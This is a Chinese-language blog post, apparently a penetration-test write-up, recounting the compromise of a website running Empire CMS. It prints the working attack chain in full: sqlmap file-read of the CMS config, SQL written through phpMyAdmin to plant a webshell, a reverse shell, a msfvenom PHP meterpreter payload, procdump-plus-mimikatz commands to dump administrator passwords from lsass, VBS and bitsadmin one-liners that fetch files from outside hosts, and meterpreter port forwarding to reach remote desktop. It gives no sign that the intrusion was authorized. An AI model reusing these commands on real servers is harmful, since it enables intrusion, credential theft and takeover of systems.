一次艱難的網站滲透

一次web滲透實戰分享~

信息收集

對某網站進行的一次滲透過程。

存在php探針,phpinfo,phpmyadmin

image.png

image.png

弱口令登錄失敗。

網站使用帝國cms7.2

image.png

弱口令登錄失敗,使用帝國cms的通用漏洞,失敗。

在知道絕對路徑的情況下,dba權限的sql注入可以直接執行os-shell命令拿shell。

掃描開放端口,反查域名,尋找最可能存在sql注入的網站。

image.png

經過多次嘗試,發現了一個聯合查詢型。且為dba權限的注入點。

image.png

sql注入的利用

已知絕對路徑,且注入點為dba權限,在平時的大多數滲透中,就已經意味著getshell了。

然而,在這次滲透中,os-shell并沒有執行成功。

image.png

經過多次嘗試都以失敗告終,猜測某種waf起了作用。

嘗試使用sqlmap的寫文件命令(–file-write 本地文件地址 –file-dest 寫入地址),直接寫入文件到網站目錄下。

image.png

image.png

沒有找到文件,多次嘗試sqlmap無法成功寫入文件。

嘗試使用sql-shell執行sql語句寫入文件。

image.png

失敗,顯示不支持非查詢語句。

image.png

肉到嘴邊吃不到呢,這感覺不好,sqlmap中所有能getshell的方法,都試的差不多了,依然沒有成功。

這時突然想起了網站存在phpmyadmin,也許可以通過phpmyadmin拿shell。

不知道數據庫密碼,需要通過sqlmap的–file-read命令讀取網站的配置文件。一般情況下網站配置文件的位置是沒法確定的,然而,網站使用了帝國cms,一般配置文件的位置是固定的。帝國cms7.0后配置文件在e/config/config.php

image.png

成功讀取到網站配置信息。

image.png

phpmyadmin的利用

使用獲取到的密碼登錄phpmyadmin

image.png

執行sql語句寫入文件。

image.png

執行成功。

image.png

訪問生成的文件,可以訪問到,使用菜刀連接失敗。

image.png

懷疑是木馬沒有免殺,或者菜刀流量被攔截。

換上免殺馬,使用插件hackbar執行一句話,和加密中轉shell流量都以失敗告終。

經過多次嘗試對比,發現腳本木馬只能夠本地執行,無法遠程執行命令。

<?php echo `ipconfig`>

生成一個本地執行ipconfig的腳本文件,并把內容輸出出來。
訪問該文件,成功訪問到輸出的ip信息。

image.png

image.png

猜測正向連接無法使用,只能使用反向連接,把對方的shell反彈到公網。
把反彈腳本轉化為16進制。

image.png

開啟nc監聽,訪問生成的文件。

image.png

反彈成功,且為最高權限。

image.png

但是進程中發現存在360全家桶。無法添加用戶。只能嘗試讀取當前管理員的密碼。
且上傳Mimikatz無法做到免殺。

采取另一種方案Procdump+Mimikatz:

Procdump由微軟官方提供:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
分為2步:
1、導出lsass.exe進程

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2、使用mimikatz破解導出的文件lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

因此現在需要上傳procdump64.exe生成lsass.dmp文件,下載下來在本地讀取密碼。

在只能輸入dos命令的情況下一般通過2種方法下載文件。

1、創建downfile.vbs下載文件。

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs
cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp

2、使用bitsadmin命令

bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg

首先利用第一種方法下載,上傳vbs文件失敗了,360全家桶果然可以。vps被當成病毒被殺了。

使用第二種方法,也失敗了,不知道是由于什么原因失敗的。

在dos命令無法滿足我的情況下,msf出場了。

msf的利用

由于到目前為止,只能通過數據庫進行文件的上傳。

因此需要用到php的反彈木馬,再加上360全家桶不會去檢查網站文件的安全性,省了免殺處理的環節。

php反彈木馬使用php/meterpreter/reverse_tcp模塊

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php

image.png

轉化為16進制,使用phpmyadmin上傳,開啟監聽,訪問上傳的文件。

image.png

成功接收到了會話。

使用meterpreter的上傳命令上傳procdump64.exe到網站根目錄

使用procdump64.exe -accepteula -ma lsass.exe lsass.dmp命令導出lsass.dmp文件到根目錄下載下來。

image.png

使用內核相同到虛擬機運行mimikatz,得到管理員明文的賬戶密碼。

image.png

到這一步已經得到了管理員到賬戶密碼,下一步需要把遠程連接服務轉發出來。

使用tasklist /svc命令查看TermService的進程號。

使用netstat -ano查看進程號對應的端口為5277

確定5277為修改后遠程桌面服務端口。

在meterpreter中使用端口轉發,轉發5277到本地的5555端口。

portfwd add -l 5555 -p 5277 -r 192.168.100.208

遠程桌面連接本地的5555端口,輸入得到的賬戶密碼,登錄成功。

image.png

證實了服務器的防護很多,vbs文件被殺了!終于滲透成功,總歸只能說網站的運行權限太高了,如果只是普通用戶,想要拿下這臺服務器可真的是太難了。

4

訪客評論被關閉

Loading...

填寫個人信息

姓名
電話
郵箱
公司
行業
職位
css.php 重庆百变王牌走势图